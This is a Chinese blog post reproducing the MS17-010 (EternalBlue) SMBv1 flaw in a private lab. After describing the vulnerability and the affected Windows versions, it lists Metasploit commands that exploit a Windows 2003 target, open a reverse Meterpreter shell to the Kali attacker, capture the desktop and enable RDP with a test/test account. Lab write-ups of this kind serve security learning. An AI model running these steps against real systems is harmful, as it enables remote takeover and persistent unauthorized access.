- 1、 漏洞描述
①SMB协议是一 个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和进程间通信服务等,还可以实现客户端和服务器之间的远程过程子协议的认证传输。
②Windows的SMB服务处理 SMBv1接收的特殊设计的数据包,发生缓冲区溢出,导致攻击者在目标系统上可以执行任意代码。2、漏洞威胁
能远程主动发起对漏洞主机135\137\138\139\445端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。3、漏洞影响范围
Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016 - 实验一(利用msf攻击win2003)
靶机(win2003)192.168.21.132
kali:192.168.21.128- msfconsole 进入msf
- search ms17_010 查询ms17_010漏洞的攻击脚本(exp/poc)
- use exploit/windows/smb/ms17_010_psexec 用这个攻击脚本
- show options 查看攻击脚本的设置
- set RhOSTS 192.168.21.132 根据脚本提示设置攻击目标
- set LHOST 192.168.21.128 根据脚本提示设置反弹shell的目标(也就是kali的ip)
- run 开始攻击
- 攻击成功反弹meterpreter >
- screenshot 截取靶机的桌面形成照片
- 开启3389远程桌面连接
- run post/windows/manage/enable_rdp username=test password=test 直接开启远程桌面
- 更多操作
永恒之蓝(ms17_010)漏洞复现
发布于 2022-02-22 1936 次阅读
Comments NOTHING